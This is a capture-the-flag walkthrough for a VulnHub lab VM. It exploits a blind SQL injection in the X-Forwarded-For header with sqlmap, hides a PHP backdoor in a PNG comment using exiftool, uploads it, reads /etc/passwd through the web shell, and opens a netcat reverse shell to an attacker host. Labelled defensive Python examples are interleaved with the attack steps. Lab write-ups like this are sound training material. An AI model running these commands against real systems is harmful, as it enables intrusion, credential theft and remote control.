
Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

KeCa

Hello friends! Today we are going to solve another CTF challenge, "From SQL injection to Shell II"; you can read part 1 from here. This VM is developed by Pentester Lab. You can download it from here: https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell-ii,69/

Install the ISO image in VMware and start it. The task in this lab is to gain access to the administration console and upload a PHP webshell.

Level: Intermediate

Penetration Methodology
  • Network scanning (Nmap)
  • Identifying blind time-based SQL injection
  • Exploiting the SQL injection (sqlmap)
  • Hiding a web shell inside an image (ExifTool)
  • Uploading the web shell
  • Spawning a shell (Netcat)

Walkthrough

The target has the IP address 192.168.1.102; let's use nmap to find the open ports.

Code:
nmap -A 192.168.1.102

Since the HTTP port is open, we open the target IP in a web browser and are welcomed by the "My Awesome Photoblog" page. It contains the tags home, test, ruxcon, 2010, all pictures and admin. Click on test.

The URL http://192.168.1.102/cat.php?id=1 runs a SQL query for ID 1. Let's check whether it is vulnerable to SQL injection by appending an apostrophe (') to the end of the URL:

Unfortunately, this page is not vulnerable to error-based SQL injection. As the author already mentioned, here you will learn "Blind SQL injection exploitation using time-based exploitation" and "Gaining code execution using a PHP webshell".

Then I used Acunetix to scan the target, and it rated the threat level as high for blind SQL injection.

Hence it is clear that we can exploit the target through SQL injection.

After a little more research, I found a way to exploit it using sqlmap. The injection point is the X-Forwarded-For request header; the asterisk in the header value tells sqlmap where to inject.

Code:
sqlmap -u "http://192.168.1.102/cat.php?id=1" --headers="X-Forwarded-For: *" --dbs --dump-all --batch

If you remember, the title of the web page was "An Awesome Photoblog", hence the database name must be photoblog.
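To show why a request header can be an injection point at all, here is an added example (not code from the original post or from the Pentester Lab application): a hypothetical visitor-log INSERT that pastes X-Forwarded-For into the SQL text, next to the parameterized version and a header validator. The visitor-log table and its columns are assumptions for illustration; the page only shows that the header is where the injection lands.

```python
import ipaddress
import sqlite3

def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (ip TEXT, page TEXT)")  # assumed schema
    return conn

def log_visit_vulnerable(conn, xff, page):
    # The header value is pasted into the statement text, so whoever sets
    # X-Forwarded-For controls the SQL itself, not merely the stored value.
    sql = f"INSERT INTO visits (ip, page) VALUES ('{xff}', '{page}')"
    conn.execute(sql)
    conn.commit()

def log_visit_safe(conn, xff, page):
    # Bound parameters: the header can only ever be data.
    conn.execute("INSERT INTO visits (ip, page) VALUES (?, ?)", (xff, page))
    conn.commit()

def validate_xff(value):
    # Defence in depth: X-Forwarded-For is a comma-separated list of IP
    # addresses and nothing else; anything that does not parse raises ValueError.
    return [str(ipaddress.ip_address(p.strip())) for p in value.split(",")]

def stored_rows(conn):
    return conn.execute("SELECT ip, page FROM visits ORDER BY rowid").fetchall()

# Constructed header value that closes the quoted IP and appends a second row.
PAYLOAD = "1.2.3.4', 'injected'), ('9.9.9.9"

if __name__ == "__main__":
    db = new_db()
    log_visit_vulnerable(db, PAYLOAD, "cat.php")
    print("vulnerable:", stored_rows(db))  # two rows, one chosen by the client
    db = new_db()
    log_visit_safe(db, PAYLOAD, "cat.php")
    print("safe:", stored_rows(db))        # one row, payload stored literally
```

The same structural control over the statement is what sqlmap turns into time-based extraction against the real application.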

Now let's dump all the data in the photoblog database with the following command:

Code:
sqlmap -u "http://192.168.1.102/cat.php?id=1" --headers="X-Forwarded-For: *" -D photoblog --dump-all --batch

Now use the credentials found above to access the administration console: open 192.168.1.102 in the browser again, click on the login tab, and log in with username admin and password P4ssw0rd.

Congrats!!! The first task is completed.

Now the last task is to upload a PHP webshell. In the administration console you will see a link "Add a new picture" for uploading an image to the web server. Click on it.

I tried to upload a malicious PHP file with a .php extension, with a double extension (.php.jpg), and with case variants such as .PHP and .pHP, but the upload of the backdoor failed every time and the following web page opened.

Then I used ExifTool to bind a malicious PHP file into an image, which gives remote code execution once the image is uploaded. To do this I downloaded an image "1.png" and copied simple-backdoor.php from /usr/share/webshells/php/ to the desktop, to bind it with the downloaded image.

Now run ExifTool to hide the PHP code inside the Comment field of the PNG image, then print the image's metadata to confirm it:

Code:
cd Desktop
exiftool "-comment<=simple-backdoor.php" 1.png
exiftool 1.png

As you can see, the malicious code is now stored inside the image's metadata.
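On the defending side, what ExifTool just did is write a tEXt chunk into the PNG; the pixel data is untouched. The following added example (not code from the original post or from ExifTool) parses the PNG chunk list, flags ancillary chunks whose text looks like server-side code, and rebuilds the file from critical chunks only, which is the sanitisation an upload handler should apply. The sample image is constructed in the code and carries only a harmless marker string.

```python
import struct
import zlib
PNG_SIG = b"\x89PNG\r\n\x1a\n"
CRITICAL = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}  # everything else is ancillary metadata
CODE_MARKERS = (b"<?php", b"<?=", b"<script")

def _chunk(ctype, data):
    # length + type + data + CRC32 computed over type and data
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def parse_chunks(png):
    # Walk the chunk list, verifying the signature and every CRC.
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype, data = png[pos + 4:pos + 8], png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if crc != zlib.crc32(ctype + data) & 0xFFFFFFFF:
            raise ValueError("bad CRC in %r chunk" % ctype)
        chunks.append((ctype, data))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks

def _text_payload(ctype, data):
    # zTXt stores keyword, NUL, method byte, then deflated text; others are plain.
    if ctype == b"zTXt":
        return zlib.decompress(data.partition(b"\x00")[2][1:])
    return data

def find_embedded_code(png):
    # Ancillary chunk types whose payload looks like server-side code.
    hits = []
    for ctype, data in parse_chunks(png):
        text = b"" if ctype in CRITICAL else _text_payload(ctype, data).lower()
        if any(m in text for m in CODE_MARKERS):
            hits.append(ctype)
    return hits

def strip_ancillary(png):
    # Rebuild from critical chunks only: pixels survive, the Comment does not.
    return PNG_SIG + b"".join(_chunk(t, d) for t, d in parse_chunks(png) if t in CRITICAL)

# Constructed 1x1 RGB image with a harmless marker in a "Comment" tEXt chunk,
# the chunk exiftool writes for "-comment<=" on a PNG.
_IHDR = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
SAMPLE_PNG = (PNG_SIG + _chunk(b"IHDR", _IHDR)
              + _chunk(b"tEXt", b"Comment\x00<?php /* constructed marker */ ?>")
              + _chunk(b"IDAT", zlib.compress(b"\x00\xff\x00\x00")) + _chunk(b"IEND", b""))
```

Stripping metadata only removes the payload; the other half of the fix is never letting the web server execute anything under the uploads directory.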

Now I browse to 1.png and add it as a new image; this file is our PHP webshell.

Our malicious file was successfully uploaded to the web server. You can see a new row named "webshell php", which contains our PHP backdoor; now click on it.

We have uploaded the image with the backdoor hidden inside; now let's try to execute it.

After inspecting the page source we found the link to the uploaded image; now let's open it.

Since we know the image contains a web shell that allows remote code execution, after exploring the path enumerated above I try to read the /etc/passwd file:

Code:
http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=cat+/etc/passwd

As you can see, we have successfully pulled the passwd file, so now we can spawn the victim's shell through it.

Let's start a netcat listener in a terminal and trigger a netcat reverse connection through the web shell:

Code:
nc -lvp 6666
http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=nc 192.168.1.105 6666 -e /bin/sh

Superb!!! We completed the last challenge too; here we have spawned the victim's shell.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here